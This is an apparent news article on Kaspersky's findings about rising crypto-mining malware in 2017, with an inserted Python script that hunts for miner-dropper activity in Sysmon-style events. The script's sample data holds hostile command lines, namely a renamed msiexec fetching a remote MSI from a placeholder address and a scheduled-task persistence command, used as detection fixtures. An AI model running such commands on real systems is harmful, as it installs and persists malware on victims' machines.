Last year saw crypto-mining malware attacks rise by more than 40%, with some hacking groups earning millions, according to new research from Kaspersky Lab.
The Russian AV firm claimed that 2.7m users were attacked with malicious miners in 2017, up from 1.9m in 2016.
The threat is typically spread via potentially unwanted application (PUA) partner programs, or by in-browser mining scripts such as Coinhive. Kaspersky Lab claimed to have blocked the latter 70 million times for customers in 2017.
The vendor also said that cyber-criminals are increasingly lifting tactics from the targeted attack playbook, such as process hollowing.
“A victim may have just wanted to download a legitimate application, but instead they downloaded a PUA with a miner installer inside. This miner installer drops the legitimate Windows utility msiexec with a random name, which downloads and executes a malicious module from the remote server,” Kaspersky explained in a blog post.
“In the next step, it installs a malicious scheduler task which drops the miner’s body. This body executes the legitimate system process and uses a process-hollowing technique (the legitimate process’s code is replaced with malicious code). Also, a special flag, the system-critical flag, is set on this new process. If a victim tries to kill this process, the Windows system will reboot. So, it is a challenge for security solutions to deal with such malicious behavior and detect the threat properly.”
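The hollowed process and its critical flag are the last links in the chain Kaspersky describes, and neither shows up in ordinary process-creation telemetry. The earlier links do: a copy of msiexec.exe running under a random name, msiexec pulling a package from a remote URL, and a scheduled task being registered by a binary in a user-writable directory. The following script is an added example written for this page (it is not Kaspersky's code and not taken from the blog post) that runs three such hunting rules over a handful of constructed Sysmon-style Event ID 1 records. The file names, paths, task name and the 203.0.113.10 address are all made up for illustration.

```python
"""Hunt for the PUA miner-dropper chain in Sysmon-style process-create events.

Three heuristics, each matching one step of the chain described above:
  1. renamed_msiexec            - PE OriginalFileName says msiexec.exe but the
                                  on-disk name does not
  2. msiexec_remote_package     - msiexec handed an http(s):// package URL
  3. task_from_user_writable_parent - schtasks /create launched by a parent
                                  living under Users/AppData/Temp/ProgramData
All sample events are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Subset of Sysmon Event ID 1 fields needed for the rules."""
    image: str               # full path of the new process
    original_file_name: str  # OriginalFileName from the PE version resource
    command_line: str
    parent_image: str


# Constructed sample telemetry. 203.0.113.10 is a documentation-range address.
SAMPLE_EVENTS = [
    # benign: real msiexec installing a local package from Explorer
    ProcEvent(r"C:\Windows\System32\msiexec.exe", "msiexec.exe",
              r'msiexec.exe /i "C:\Users\alice\Downloads\7z1805-x64.msi"',
              r"C:\Windows\explorer.exe"),
    # suspicious: msiexec copied to a random name, fetching a remote MSI
    ProcEvent(r"C:\Users\alice\AppData\Local\Temp\kdf82h.exe", "msiexec.exe",
              r"kdf82h.exe /q /i http://203.0.113.10/upd.msi",
              r"C:\Users\alice\Downloads\FreeVideoConverter.exe"),
    # suspicious: the dropper registering a scheduled task for the miner body
    ProcEvent(r"C:\Windows\System32\schtasks.exe", "schtasks.exe",
              r'schtasks.exe /create /tn "WinUpdt" /tr "C:\ProgramData\svc\upd.exe" /sc minute /mo 5',
              r"C:\Users\alice\AppData\Local\Temp\kdf82h.exe"),
    # benign: an administrator creating a task from a system-path shell
    ProcEvent(r"C:\Windows\System32\schtasks.exe", "schtasks.exe",
              r'schtasks.exe /create /tn "Backup" /tr "C:\Program Files\Backup\run.exe" /sc daily',
              r"C:\Windows\System32\cmd.exe"),
]

# Path fragments that ordinary users can write to (lower-cased, backslash form).
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")
REMOTE_URL = re.compile(r"\bhttps?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def in_user_writable_dir(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def renamed_msiexec(ev: ProcEvent) -> bool:
    """The binary is msiexec by version info but not by on-disk name."""
    return (ev.original_file_name.lower() == "msiexec.exe"
            and basename(ev.image) != "msiexec.exe")


def msiexec_remote_package(ev: ProcEvent) -> bool:
    """msiexec (under any name) asked to install a package from a URL."""
    return (ev.original_file_name.lower() == "msiexec.exe"
            and bool(REMOTE_URL.search(ev.command_line)))


def task_from_user_writable_parent(ev: ProcEvent) -> bool:
    """schtasks /create spawned by something living in a user-writable path."""
    return (basename(ev.image) == "schtasks.exe"
            and "/create" in ev.command_line.lower()
            and in_user_writable_dir(ev.parent_image))


RULES = [
    ("renamed_msiexec", renamed_msiexec),
    ("msiexec_remote_package", msiexec_remote_package),
    ("task_from_user_writable_parent", task_from_user_writable_parent),
]


def hunt(events):
    """Return [(event_index, [matched_rule_names]), ...] for events that fire."""
    findings = []
    for idx, ev in enumerate(events):
        hits = [name for name, rule in RULES if rule(ev)]
        if hits:
            findings.append((idx, hits))
    return findings


if __name__ == "__main__":
    for idx, hits in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx].image} -> {', '.join(hits)}")
```

The OriginalFileName comparison is the load-bearing check: renaming a signed Microsoft binary changes the path Sysmon logs but not the version resource embedded in the file, so a mismatch between the two is cheap to evaluate and rare in legitimate activity. The other two rules will produce some noise in environments where installers legitimately pull MSIs over HTTP or where user-space software registers its own update tasks, so treat them as enrichment on the first hit rather than stand-alone alerts.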
Some groups are also targeting organizations to tap their greater computing power. Wannamine was spread through internal networks using an EternalBlue exploit, earning 9000 Monero ($2m) for its authors.
In another attack, hackers apparently infiltrated a corporate network, gained access to the domain controller and were then able to use Group Policy to run a malicious PowerShell script on every corporate endpoint.
Crypto-mining botnets have earned cyber-criminals $7m in the second half of 2017 alone, with one group making $5m mining Electroneum coins, Kaspersky Lab claimed.
A report from Cisco earlier this year said that cyber-criminals are increasingly eschewing ransomware in favor of more lucrative crypto-mining campaigns, claiming it could earn them as much as $100m per year.